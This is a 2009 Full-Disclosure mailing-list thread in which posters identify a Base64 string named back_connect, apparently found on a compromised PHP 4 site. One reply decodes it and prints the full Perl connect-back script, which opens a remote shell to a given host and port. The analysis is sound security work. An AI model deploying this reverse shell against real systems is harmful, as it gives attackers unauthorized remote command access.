Re: [Full-disclosure] connect back PHP hack

Tue, 10 Feb 2009 11:26:15 -0800 

Technically it doesn't decrypt to anything, it decodes. :)


On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote:

> On Tue, Feb 10, 2009 at 8:23 PM, sr. <static...@gmail.com> wrote:
>> can anyone tell me what encoding this is?
>>
>> $
>> back_connect
>> =
>> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
>> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
>> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
>> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
>> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
>> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
>> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>>
>> this has to do with old php 4.x.x version with magic quotes enabled.
>> i'm just trying to figure out what the connect back code does.
>>
>> any input is much appreciated.
>>
>> thx,
>>
>> sr.
>>
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


        Simon Smith
        si...@snosoft.com
         --------------------------------------

        Subscribe to our blog
         http://snosoft.blogspot.com




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to